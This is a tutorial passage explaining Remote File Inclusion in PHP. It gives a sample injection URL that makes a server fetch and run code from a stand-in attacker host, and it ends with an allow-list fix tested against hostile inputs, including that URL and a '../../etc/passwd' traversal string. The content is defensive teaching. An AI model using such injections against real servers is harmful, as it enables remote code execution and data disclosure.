Remote File Inclusion (RFI) is a technique for including remote files in a vulnerable application. Like Local File Inclusion (LFI), RFI occurs when user input is improperly sanitized, allowing an attacker to inject an external URL into the include function.
One requirement for RFI is that the allow_url_fopen option needs to be on.
The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:
- Sensitive Information Disclosure
- Cross-site Scripting (XSS)
- Denial of Service
An external server hosting malicious files must communicate with the application server for a successful RFI attack. The malicious file is injected into the include function via HTTP requests, and the content of the malicious file executes on the vulnerable application server.
Example
Let's say that the attacker hosts a PHP file on their own server, http://attacker.thm/cmd.txt, where cmd.txt contains PHP code:
<?php echo "Hello World"; ?>
First, the attacker injects the malicious URL, which points to the attacker's server, such as
http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt
If there is no input validation, the malicious URL is passed to include. Next, the web app server sends a GET request to the malicious server to fetch the file. As a result, the web app includes the remote file, executes its PHP code within the page, and sends the output back to the attacker.
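The missing input validation described above can be closed with an allow-list, shown here as an added example that is not code from the original page. The function name resolve_lang_file, the LANG_FILES map and the languages/ directory are assumptions; the final loop also reports allow_url_include, a separate PHP setting that must be on before include will fetch a URL.

```php
<?php
// Added example. The map, the function name and the languages/ directory
// are assumptions for illustration, not taken from the page.

// Pattern the text describes: the raw parameter reaches include, so a URL
// value is fetched and executed when remote includes are enabled.
//   include $_GET['lang'];

// Hardened form: the request value only selects a key from a fixed map
// and never becomes part of the path or URL that is included.
const LANG_FILES = [
    'en' => 'en.php',
    'fr' => 'fr.php',
];

/**
 * @param mixed  $requested raw value of the lang parameter (may be null or an array)
 * @param string $baseDir   directory holding the language files
 */
function resolve_lang_file($requested, string $baseDir): string
{
    // Anything that is not a known key (URLs, traversal strings, arrays,
    // a missing parameter) falls back to the default language.
    $key = (is_string($requested) && array_key_exists($requested, LANG_FILES))
        ? $requested
        : 'en';
    return rtrim($baseDir, '/') . '/' . LANG_FILES[$key];
}

// Constructed sample inputs, including the URL from the example above.
$samples = ['fr', 'http://attacker.thm/cmd.txt', '../../etc/passwd', ['x'], null];
foreach ($samples as $sample) {
    echo json_encode($sample), ' => ',
         resolve_lang_file($sample, __DIR__ . '/languages'), PHP_EOL;
}

// Defense in depth: report whether this runtime would permit URL includes.
// Both settings should be Off unless the application needs them.
foreach (['allow_url_fopen', 'allow_url_include'] as $option) {
    $enabled = filter_var(ini_get($option), FILTER_VALIDATE_BOOLEAN);
    echo $option, ' = ', $enabled ? 'On' : 'Off', PHP_EOL;
}
```

In index.php the call would be include resolve_lang_file($_GET['lang'] ?? null, __DIR__ . '/languages'); so that only files named in the map can ever be included.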